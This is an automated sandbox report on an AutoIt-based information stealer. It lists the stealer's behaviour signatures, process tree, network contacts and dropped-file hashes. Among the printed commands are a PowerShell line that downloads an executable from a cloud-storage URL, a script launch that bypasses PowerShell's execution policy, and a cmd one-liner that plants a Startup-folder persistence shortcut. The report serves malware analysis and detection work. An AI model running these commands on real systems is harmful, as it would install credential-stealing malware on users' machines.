Malware Analysis Report

2025-05-28 18:49

Sample ID 241117-c3yjpayhmd
Target e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
SHA256 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
Tags
collection discovery execution spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172

Threat Level: Known bad

The file e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172 was found to be: Known bad.

Malicious Activity Summary

collection discovery execution spyware stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Executes dropped EXE

Drops startup file

Loads dropped DLL

Checks installed software on the system

Accesses Microsoft Outlook accounts

Accesses Microsoft Outlook profiles

Drops file in System32 directory

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

outlook_office_path

Checks processor information in registry

outlook_win_path

Suspicious use of FindShellTrayWindow

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-17 02:36

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-17 02:36

Reported

2024-11-17 02:39

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1424 created 3548 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 1424 created 3548 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 1508 created 3548 N/A C:\Users\Public\jsc.exe C:\Windows\Explorer.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\rundll32.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1508 set thread context of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Windows\SysWOW64\rundll32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Guard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D2712372EE1B3DE6DF260CAA5E2803763B5A36D2\Blob = 030000000100000014000000d2712372ee1b3de6df260caa5e2803763b5a36d220000000010000005e0200003082025a308201c3a0030201020208349f485c1aa3c093300d06092a864886f70d01010b050030653136303406035504030c2d4d6963726f736f66742052534120526f6f7420437172746966696361746520417574686f726974792032303137311e301c060355040a0c154d6963726f736f667420436f72706f726174696f6e310b3009060355040613025553301e170d3232313131383032333830335a170d3236313131373032333830335a30653136303406035504030c2d4d6963726f736f66742052534120526f6f7420437172746966696361746520417574686f726974792032303137311e301c060355040a0c154d6963726f736f667420436f72706f726174696f6e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100cde5095836c38f70ef8449624a6081796f881e34ac1e271959d5bfa4906ca8652aff7b674dd0f1efe8775116c2d3a8f89fd26b9753036bd2a9025194275b437c78ffa9b948b8926960f9913bb4a1f2752b25fea91186ce3b08aa5cf939e7312ea10a82ec5aa714ac80b7f8f61e7a0ae21b1134a83f50ba447f99dc7e18cdbba90203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010b05000381810095d99cb2bc2c9017e3e6492532c0cc001fb2bd1edb0857c0ff48d1d9f540cde51c6d5e3de0276e1d9f159e08468e4aaba73d222282f5ddec0b5926d9a2c4a26dfd4a3ac168a40edb25bc726d06dbae9bf42b0df2c42e6ee3372f9cd4c66d51607a113b13cdd22ac76ea9e5b0521536bed29f4e372dbfa8af5430700e4f5ec6bc C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D2712372EE1B3DE6DF260CAA5E2803763B5A36D2 C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4780 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 4784 wrote to memory of 1424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 4784 wrote to memory of 1424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 1424 wrote to memory of 4072 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1424 wrote to memory of 4072 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1424 wrote to memory of 4072 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1424 wrote to memory of 1508 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1424 wrote to memory of 1508 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1424 wrote to memory of 1508 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1424 wrote to memory of 1508 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1424 wrote to memory of 1508 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 400 wrote to memory of 4444 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 400 wrote to memory of 4444 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 400 wrote to memory of 4444 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4444 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4444 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4444 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 400 wrote to memory of 4612 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 400 wrote to memory of 4612 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 400 wrote to memory of 4612 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"

C:\Users\Public\Guard.exe

"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

"C:\Users\Public\jsc.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log",start

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 400 -ip 400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 2028

Network

Country Destination Domain Proto
US 8.8.8.8:53 my.cloudme.com udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 4.241.140.83.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
FR 46.105.141.51:443 tcp
US 8.8.8.8:53 51.141.105.46.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:17227 tcp
N/A 127.0.0.1:17227 tcp

Files

memory/3900-0-0x00007FFFAEA13000-0x00007FFFAEA15000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y5dkh3dj.1tb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3900-10-0x00000179CA180000-0x00000179CA1A2000-memory.dmp

memory/3900-11-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

memory/3900-12-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

memory/3900-16-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4784-28-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

memory/4784-29-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

memory/4784-30-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

C:\Users\Public\PublicProfile.ps1

MD5 315eab1b113060397deb5d4013e64eae
SHA1 d1578170885d0375b2aa22954badaeb36a539026
SHA256 dae667196e8dc197c7e0a5ecb4718d26f8a8276c72cc190e14cdf8ed67b3b8c5
SHA512 f74b12217c36bac596bda9ac1d86d256a13591916774b795dbd1cf1525c90f93d0b9fe26b68f19a4dacb751d0b4f3649e9cf42a2fa0a1e916b9326fbe3c09ced

memory/4784-33-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

memory/4784-34-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

memory/4784-35-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

C:\Users\Public\Guard.exe

MD5 18ce19b57f43ce0a5af149c96aecc685
SHA1 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256 d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512 a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

memory/4784-40-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

C:\Users\Public\Secure.au3

MD5 4bdd41d598fd897ce21bd86264030448
SHA1 2907df32a0b8fb017a0f5ba53605245cc0119c44
SHA256 daf4100279eaabf2c17b8e08026f4da4ebd817dc16d381b3daebe7adb9384c7c
SHA512 7d3895d6640566bac911c3638328fd794ffcc6fcf4ce365848f0e498df16b4a5c5659efd4fb4eacb51d3d9a394457f55b9f3ae1c530de99554728b94d57d531f

memory/1508-49-0x0000000001100000-0x00000000015C2000-memory.dmp

